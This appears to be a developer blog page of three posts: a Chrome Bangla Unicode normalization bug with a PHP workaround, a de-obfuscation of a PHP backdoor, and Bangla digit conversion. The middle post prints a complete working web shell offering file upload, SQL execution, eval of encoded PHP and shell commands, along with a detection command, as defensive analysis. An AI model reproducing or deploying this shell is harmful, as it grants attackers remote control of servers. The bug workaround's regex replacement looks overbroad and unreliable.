Google Chrome Unicode normalization and য়, ড়, ঢ় problem

If you are using Google Chrome and writing Bangla, you might have already faced this problem. Every time you send a POST request (it just happens to POST data only) Google Chrome changes normalizes Unicode characters automatically. In Bangla Language Chrome normalizes 3 characters. These are য়, ড় and ঢ়.

What Chrome Actually do?

If you look carefully each of these 3 characters has a dot (.) underneath. Also there are 3 other characters in Bangla which are same like this but without dot. In Bangla there are actually 6 characters, ড, ঢ, য, ড়, ঢ়, য়. Chrome just uses the first 3 and adds a dot underneath to form the last 3. This is called normalization. Each time we send request that contains the last 3 characters, Chrome just converts them to corresponding first 3 characters and then adds a dot.  This happens only for those data that resides in HTTP request body. So, this behaviour is not found for Cookie, Header or in Query string as all of these three data sources reside in HTTP request header. I suspect it also happens with PUT type request.

An Example

Lets say we are going to submit a form with request method is POST.  It has a input field. If you type “গাঢ় সবুজ পেয়াড়া” (a sentence that contains all the problem characters) and submit the form, Chrome will submit “গাঢ় সবুজ পেয়াড়া”. These string may look alike. But they are different! In hex, The red stands for modified characters and green for newly added characters. Spaces are used to align.

before: hex(গাঢ় সবুজ পেয়াড়া)= e0a697e0a6bee0a79d      20e0a6b8e0a6ace0a781e0a69c20e0a6aae0a787e0a79f      e0a6bee0a79c      e0a6be
after:  hex(গাঢ় সবুজ পেয়াড়া)= e0a697e0a6bee0a6a2e0a6bc20e0a6b8e0a6ace0a781e0a69c20e0a6aae0a787e0a6afe0a6bce0a6bee0a6a1e0a6bce0a6be

Key points:

Some key points to be noted.

  • This normalization takes place any data that reside in HTTP Request body. So only POST and  PUT will be affected. Cookie, Header and Query string data will be unaffected.
  • The inconsistency between HTTP request body and header part confirms this as a Chrome bug.
  • Either it should be normalized all over HTTP request or nowhere.

Solution:

As you have already understood the problem you know how to solve it. Just file a bug to Google Chrome team. As long as google does not fix this you can just replace those characters in your web application.  Here is a snipped I have written to fix this in PHP.

[code language=”PHP”]
class DeNormalOntosteo {
private static $strmap = array(‘/য/’ => ‘য়’, ‘/ড/’ => ‘ড়’, ‘/ঢ/’ => ‘ঢ়’);
public static function replace($data) {
if (is_array($data)) {
$keys = array_keys($data);
$values = array_values($data);
$len = count($values);
while ($len–) {
$values[$len] = preg_replace(array_keys(self::$strmap), array_values(self::$strmap), $values[$len]);
}
return array_combine($keys, $values);
} elseif (is_string($data)) {
return preg_replace(array_keys(self::$strmap), array_values(self::$strmap), $data);
} else {
return false;
}
}
}
[/code]

Usage

[code lang=”PHP”]
// Denormalizing $_POST array
$_POST = DeNormalOntosteo::replace($_POST);
// Denormalizing a string
$_POST[‘data’] = DeNormalOntosteo::replace($_POST[‘data’]);
[/code]

Update 1:

I have created a page where you can see the bug in action. You must use google chrome to browse this page. Just visit and press submit.

Update 2: 

I have filed a bug on chromium team on google code. If you are having same issue please give them a knock here.

De-obfuscate a backdoor PHP script

Today (almost 1 hour ago) I got an script encoded. At first look I though its one of those wordpress footer files which are obfuscated by theme makers.  So I started to decode it. The process of decoding is very simple. Mainly by replacing “eval” with “echo”.  I am not gonna describe the detailed process.

I use this code to decode it.

[code language=”php”]
$contents = file_get_contents("php://stdin");$create_function = ‘\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e’;
$base64_decode =’\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65′;
if(strpos($contents, $create_function)!==false){
echo "create_function() invocation found! \n";
if(strpos($contents, $base64_decode)!==false){
echo "base64_decode() invocation found! \n";
}
}

// finding base64 pattern

preg_match(‘/"([a-zA-Z0-9\/+]{500,}[=]{0,2})"/’, $contents, $m);
$data = base64_decode($m[1]);
eval(str_replace(‘eval’, ‘echo’, $data));
[/code]

And here is the result.

[code language=”PHP”]error_reporting(E_ERROR | E_WARNING | E_PARSE);
ini_set(‘display_errors’, "0")
if ($_POST["p"] != "") {
$_COOKIE["p"] = $_POST["p"];
setcookie("p", $_POST["p"], time() + 3600);
}

if (md5($_COOKIE["p"]) != "ca3f717a5e53f4ce47b9062cfbfb2458") {
echo "<form method=post>";
echo "<input type=text name=p value=” size=50>";
echo "<input type=submit name=B_SUBMIT value=’Check’>";
echo "</form>";
exit;
}

if ($_POST["action"] == "upload") {

$l=$_FILES["filepath"]["tmp_name"];
$newpath=$_POST["newpath"];
if ($newpath!="") move_uploaded_file($l,$newpath);
echo "done";

} else if ($_POST["action"] == "sql") {

$query = $_POST["query"];
$query = str_replace("\’","’",$query);
$lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die (‘Not connected : ‘ . mysql_error());
mysql_select_db($_POST["db"], $lnk) or die (‘Db failed: ‘ . mysql_error());
mysql_query($query, $lnk) or die (‘Invalid query: ‘ . mysql_error());
mysql_close($lnk);
echo "done<br><pre>$query</pre>";

} else if ($_POST["action"] == "runphp") {

eval(base64_decode($_POST["cmd"]));

} else {

$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
} else $disablefunc = array();

function myshellexec($cmd) {
global $disablefunc;
$result = "";
if (!empty($cmd)) {
if (is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec($cmd,$result); $result = @join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !@in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !@in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = @popen($cmd,"r"))) {
$result = "";
while(!feof($fp)) {$result .= @fread($fp,1024);}
@pclose($fp);
}
}
return $result;
}
$cmd = stripslashes($_POST["cmd"]);
$cmd_enc = stripslashes($_POST["cmd_enc"]);
if ($_POST["enc"]==1){
$cmd=base64_decode($cmd_enc);
}
?>
<script language=javascript type="text/javascript">
<!–
var END_OF_INPUT = -1;
var base64Chars = new Array(‘A’,’B’,’C’,’D’,’E’,’F’,’G’,’H’,’I’,’J’,’K’,’L’,’M’,’N’,’O’,’P’,’Q’,’R’,’S’,’T’,’U’,’V’,’W’,’X’,’Y’,’Z’,’a’,’b’,’c’,’d’,’e’,’f’,’g’,’h’,’i’,’j’,’k’,’l’,’m’,’n’,’o’,’p’,’q’,’r’,’s’,’t’,’u’,’v’,’w’,’x’,’y’,’z’,’0′,’1′,’2′,’3′,’4′,’5′,’6′,’7′,’8′,’9′,’+’,’/’);
var reverseBase64Chars = new Array();
for (var i=0; i < base64Chars.length; i++){
reverseBase64Chars[base64Chars[i]] = i;
}
var base64Str;
var base64Count;
function setBase64Str(str){
base64Str = str;
base64Count = 0;
}
function readBase64(){
if (!base64Str) return END_OF_INPUT;
if (base64Count >= base64Str.length) return END_OF_INPUT;
var c = base64Str.charCodeAt(base64Count) & 0xff;
base64Count++;
return c;
}
function encodeBase64(str){
setBase64Str(str);
var result = ”;
var inBuffer = new Array(3);
var lineCount = 0;
var done = false;
while (!done && (inBuffer[0] = readBase64()) != END_OF_INPUT){
inBuffer[1] = readBase64();
inBuffer[2] = readBase64();
result += (base64Chars[ inBuffer[0] >> 2 ]);
if (inBuffer[1] != END_OF_INPUT){
result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30) | (inBuffer[1] >> 4) ]);
if (inBuffer[2] != END_OF_INPUT){
result += (base64Chars [((inBuffer[1] << 2) & 0x3c) | (inBuffer[2] >> 6) ]);
result += (base64Chars [inBuffer[2] & 0x3F]);
} else {
result += (base64Chars [((inBuffer[1] << 2) & 0x3c)]);
result += (‘=’);
done = true;
}
} else {
result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30)]);
result += (‘=’);
result += (‘=’);
done = true;
}
lineCount += 4;
if (lineCount >= 76){
result += (‘\n’);
lineCount = 0;
}
}
return result;
}
function encodeIt(f){
l=encodeBase64(f.cmd.value);
f.cmd_enc.value=l;
f.cmd.value="";
f.enc.value=1;
f.submit();
}
//–></script>
<?

echo "<form method=post action=” onSubmit=’encodeIt(this);return false;’>";
echo "<input type=text name=cmd value=\"".str_replace("\"","&quot;",$cmd)."\" size=150>";
echo "<input type=hidden name=enc value=’0′>";
echo "<input type=hidden name=cmd_enc value=”>";
echo "<input type=submit name=B_SUBMIT value=’Go’>";
echo "</form>";
if ($cmd != "") {
echo "<pre>";
$cmd=stripslashes($cmd);
echo "Executing $cmd \n";
echo myshellexec("$cmd");
echo "</pre>";
exit;
}
}[/code]

If you look at the code carefully, you’ll notice its a backdoor.

  • It can upload arbitrary files
  • It can execute mysql quries
  • Its can shell command
If you want to check if your  server has such script  run the following command in shell in your web root.
find . -iname '*.php' -size 28k -exec egrep '\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e' -o {} \;

Here “\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e” is hex encoded “create_function” string. This is a PHP function that creates function dynamically from string.

Convert numbers from English to Bangla

Today Ayon came up  with a problem that he needs to convert English digits to Bangla. The Input would be something like “1 ডলার = 81.55 টাকা” and the output should be “১ ডলার = ৮১.৫৫ টাকা”. How to do it?

Its very easy to do. In fact most developers will be able to do it within few minutes. I just want to share my solution.

I use PHP’s str_replace function.

[code language=”PHP”] $bn_digits=array(‘০’,’১’,’২’,’৩’,’৪’,’৫’,’৬’,’৭’,’৮’,’৯’);
$output = str_replace(range(0, 9),$bn_digits, $input); [/code]

Thats it. You can wrap it with a function and re use it.